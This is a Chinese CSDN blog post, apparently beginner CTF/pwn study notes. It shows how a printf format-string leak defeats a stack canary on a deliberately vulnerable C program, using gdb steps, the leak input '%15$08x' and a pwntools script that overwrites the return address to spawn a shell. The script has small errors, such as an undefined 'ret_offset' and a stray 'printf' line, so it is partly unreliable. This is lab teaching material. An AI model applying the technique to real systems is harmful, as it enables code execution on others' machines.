pwn入门笔记(4)——如何利用printf漏洞突破canary保护

最新推荐文章于 2024-07-06 18:55:09 发布
最新推荐文章于 2024-07-06 18:55:09 发布
阅读量462 收藏 1
点赞数 3
分类专栏: pwn的系统性学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45551695/article/details/107668887
版权

实例分析

编译printf2.c ,要加canary保护
输入
在这里插入图片描述

写exp,利用printf漏洞来突破canary
并且覆盖ret

#include<stdio.h>
void exploit()
{
    system("/bin/sh");
}
void func()
{
    char str[0x20];
    read(0, str, 0x50);
    printf(str);
    read(0, str, 0x50);
}
int main()
{
    func();
    return 0;
}

接下来进gdb
查看func函数disass func

在这里插入图片描述

我们直接下断到printf函数上,

b *0x08048565

之后运行
(随便输)
在这里插入图片描述
然后我们可以看一下堆栈stack 0x28
因为之前我们的canary在0xc上面
之后用x -$ebp -0xc来查看地址和内容
内容是0x68acb300
在这里
在这里插入图片描述
在这里插入图片描述
距离栈顶15行
之后我们试图让它输出15行的内容
在这里插入图片描述
先让程序跑起来
之后输入

%15$08x

相对于栈顶15位,输出8位,在这里插入图片描述
0x不是
x的意思是输出16位
在这里插入图片描述
然后我们可以看到我们的参数确实是这个
注意:输入之后可能会变化,建议重新运行程序,先改输入,再看堆栈

payload书写

from pwn import *
p = process("/.printf2")
p.sendline("%15$08x")//我们要先发送泄露的代码
canary = p.recv()[:8]
printf canary //输入这个来验证是否发送返回正确

canary = canary.decode("hex")[::-1]//我们之前得到的人看到的数据,但是机器是读不懂的,得输进小段倒叙储存组,后面[::-1]是倒序的意思

canary_offset = 8*4
ret_address = 3*4
exploit_address = p32(0x080484e6)
payload = canary_offset*'a'+canary+ret_offset*'a'+exploit_address

p.sendline(payload)
p.interactive()

在这里插入图片描述
中间隔了有8行,之后加上canary在这里插入图片描述
[:8]试验输出之后,我们会多一个回车,这个时候我们只要8位就行了
接下来,我们再看返回地址和main函数的距离
在这里插入图片描述
最后加上main函数的地址
我们再进入gdb,因为我们需要exploit函数的具体地址
在这里插入图片描述
至于为什么要sendline两次
在这里插入图片描述
我们read了两次

balbalba
关注
专栏目录
从汇编层面按步分析Printf漏洞利用
qq_17512883的博客
05-04 425
不知不觉,学pwn已经一个月了,在这里发布我的第一篇博客。主要想通过一道题,记录一下我的程序执行过程的理解。
linux3.13.0内核溢出漏洞exp,Linux Kernel Pwn 学习笔记(栈溢出)
weixin_42558758的博客
05-06 498
0x01 背景栈溢出是最基本的一个漏洞,学习 pwn 从栈溢出开始学习是比较简单的入门方式。之前也研究过 linux 内核,但因为种种原因不得不放弃。现在跟着安卓版主学习了几天linux内核漏洞,收获了不少知识,开始自己梳理和分享自己的笔记,特此感谢版主老师的教导0x02 内核基本知识Canary: 是防止栈溢出的保护,一般在 ebp-0x8 的位置,学习 linux pwn 的基本知识,不细讲K...
如何利用printf漏洞突破canary保护
fanghuapyk的博客
03-19 407
如何利用printf漏洞突破canary保护 原理: 1、 在所有函数调用发生时,向栈帧内压入一个额外的随机 DWORD,这个随机数被称作 “canary”,用 IDA 反汇编时,又被称作“Security Cookie”。 2、 canary 位于 EBP 之前,系统还会在.data 的内存区域中存放一个 canary 的副本。 3、 当栈中发生溢出时,canary 将被首先淹没,之后才是 EBP 和返回地址。 4、 在函数返回之前,系统将执行一个额外的安全验证操作,称作 Security Check。
Canary,三种优雅姿势绕过
最新发布
yjh_fnu_ltn的博客
07-06 751
如果利用栈溢出将最低位的b’\x00’覆盖,就可以利用答应函数将canary一致输出,最后再在最低位拼接上。逐次覆盖掉canary的4个字节(一位无法绕过低位字节堆高位进行爆破,所以必须从低到高),且要求canary不能变化,绕过重开程序canary变化,就不适用爆破了。在进行栈溢出时,如果程序开启了canary保护,首先就需要泄漏这个随机值,否则其被覆盖掉后,程序在退出时再检查该值,会引发错误。注意:canary爆破时,利用栈溢出,溢出到canary位置,从。首先确定要覆盖的位置,由于是。
[PWN][基础篇]如何利用printf漏洞突破canary保护
网络安全知识分享
03-21 4042
如何利用printf漏洞突破canary保护 使用的实例代码如下 为了配合本次实例的教学,大家在编译时,不加pie保护,加cannary保护,整个的流程就是,分析程序之后,编写exp,利用printf漏洞(填充func函数,使其返回地址为exploit函数)来突破canary并且覆盖ret。 之后使用gdb开文件,查看func函数 来自英语白痴的小tip: 我们可以大概搞清楚func的流程,就是先read,然后printf,然后read,就是这样子。 我们下断就下到printf这里,我输入的测试用例是
二进制漏洞之——邪恶的printf
FFy's Blog
06-13 5162
0x00 前言 本文是二进制漏洞相关的系列文章。printf有一些鲜为人知的特性,在为编码提供便利的同时,也引入了安全的问题。本文重点描述printf漏洞利用中的一些用法,在正常的编程中不建议这么用。 0x01 概述 printf系列函数的%$(如:%20$x)格式输出,可泄漏栈内的数据(如模块加载的基址),给攻方提供下一步所必须的信息; prinrf系列函数的%n、%hn格式输出
How printf works——浅谈格式化串漏洞
caterpillarous的博客
05-24 2285
本博客已经弃用,我的新博客地址:http://jujuba.me/ How printf works——浅谈格式化串漏洞 0x00 简介 格式化字符串漏洞由来已久,其主要原因是程序员在使用printf时未将格式化串的个数 和变量的个数相匹配,给了黑客们可乘之机。 我们可以先来看看printf函数的声明 int printf (const char *__format, ......
【学习笔记】CTF PWN选手的养成(二)
prettyX的博客
11-25 1902
第三章 漏洞利用技术 课时1 栈溢出-这些都是套路 0X01 基础知识 1、寄存器:rsp/esp、rbp/ebp等 2、栈: 3、函数调用:call、ret 4、调用约定: __stdcall、__cdecl、__fastcall、__thiscall、__nakedcall、__pascal 5、参数传递:取决于调用约定,默认如下 X86从右向左入栈 X64优先寄存器,参数过...
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 432
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 3812
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2075
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
pwn入门笔记(3)——printf漏洞调试
weixin_45551695的博客
07-28 571
printf 在C语言中,我们经常使用各种函数来进行输出操作 printf,fprintf,vprintf,vfprintf,sprint等, 其中Fomat String是其第一个参数,我们一般称之为格式化字符串 printf 接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定格式的子字符串进行对应,将格式化字符串中的特定子串,解析为相应的参数值。 解析 我们都知道printf在执行的时候,首先进行格式化字符串的解析,,从栈或者寄存器中获取参数并与符号说明相匹配,然
Pwnprintf漏洞
weixin_52553215的博客
03-10 1135
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
pwn做题笔记14-echo_back(printf函数栈详细利用+利用控制scanfIO流实现任意地址写入)
qq_40923256的博客
08-28 457
当Linux新建一个进程时,会自动创建3个文件描述符0、1和2,分别对应标准输入、标准输出和错误输出。C库中创建与文件描述符对应的是文件指针scanf读取stdin时依照读文件的方法,内部调用_IO_new_file_underflow函数。而该函数最终调用了_IO_SYSREAD系统调用来读取文件。在调用系统函数前,该函数同时进行了判断处理:根据读取指针的位置和结束位置来判断缓冲区中是否还有可读取的数据。
pwn1 格式化字符串泄露canary
qq_44832048的博客
07-27 879
前面在终端中查看保护机制和32位在前面提到过就不讲了, 只不过在这里只开启了Canary,所以我们可以用格式化字符串漏洞泄露出栈上保存的Canary,没有开启NX,说明堆栈可执行,我们可以在第二次输入中直接把shellcode布置到栈里面,然后返回到栈里 用ida简单看了一下,就是让你输入名字,然后调用get_message函数输出你的名字,让你留言,留言有溢出漏洞,显然用了printf,也有...
[PWN] BUUCTF pwn2_sctf_2016(整数溢出+泄露libc)
空城惜梦的博客
06-05 774
[PWN] BUUCTF pwn2_sctf_2016解题分析漏洞利用payload分析payload1payload2 解题分析 按照惯例先checksec,开了nx保护和部分RELRO 接着运行文件,观察程序的运行逻辑,读入一个长度len然后把输入的字符,再打印输入的Len个字符 32位IDA打开文件,main函数调用了vuln() 发现对输入的长度len做出了限制,len不能大于32 当len>32后,程序将结束,这就导致无法直接溢出 进入get_n函数,发现get_n会接收a2个长度
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3272
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数中显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
CCTF-pwn3-printf
leeham的博客
09-08 2270
CCTF-pwn3-printf 开始做“实验吧”里边的溢出题目:printf 文件解压缩之后发现里边的压缩包名为cctf-2016-pwn,于是之后就一直看cctf-2016-pwn这题的思路。 当前的结果是: 可以通过题目压缩包中的pwn-ELF文件拿到本地Shell,但是连接到服务器上就不行了……目前仍在解决当中;而且复制粘贴已有的expoit只能获取到服务器上的shell,无法获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值